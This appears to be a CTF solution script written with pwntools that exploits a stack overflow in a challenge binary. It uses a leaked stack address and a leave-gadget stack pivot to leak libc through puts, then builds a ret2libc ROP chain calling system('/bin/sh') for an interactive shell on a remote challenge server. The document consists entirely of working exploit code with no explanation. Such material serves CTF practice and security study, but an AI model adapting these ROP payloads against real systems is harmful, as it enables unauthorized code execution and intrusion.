Solution
#!/usr/bin/env python3
from pwn import *
#import time
#from termcolor import colored
#from tqdm import tqdm
elf = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
rop = ROP(elf)
context.binary = elf
context.aslr = False
context.terminal = ["alacritty", "-e", "sh", "-c"]
dbginit = """
handle SIGALRM noprint nostop nopass
b main
b vuln
b *0x40125a
"""
def conn():
if args.REMOTE:
r = remote("chall.v1t.site", 30150)
elif args.GDB:
r = gdb.debug([elf.path], gdbscript=dbginit)
else:
r = process([elf.path])
return r
def main():
r = conn()
offset = 0x60 * b'i'
r.recvuntil(b'This may help: ')
leak = r.recvuntil(b'\n')
rbp = int(leak.decode("ascii"),16)
vuln = elf.sym["vuln"]
puts = elf.sym["puts"]
addr_setbuf = elf.got["setbuf"]
fgets = elf.sym["fgets"]
rdi = 0x401214
ret = 0x401215
leave = 0x401259
payload = flat(p64(0),
p64(rdi),
p64(addr_setbuf),
p64(puts),
p64(vuln)
).ljust(0x60,b'\0')
payload += p64(rbp) + p64(leave)
r.sendline(payload)
libc.address = u64(r.recvuntil(b'\n', drop=True).ljust(8,b'\0')) - libc.sym["setbuf"]
print(f"libc: {hex(libc.address)}")
binsh = next(libc.search(b'/bin/sh'))
system = libc.sym["system"]
r.recvuntil(b'This may help: ')
leak = r.recvuntil(b'\n')
rbp = int(leak.decode("ascii"),16)
payload = flat(p64(0),
p64(ret),
p64(rdi),
p64(binsh),
p64(system),
).ljust(0x60,b'\0')
payload += p64(rbp) + p64(leave)
r.sendline(payload)
r.interactive()
if __name__ == "__main__":
main()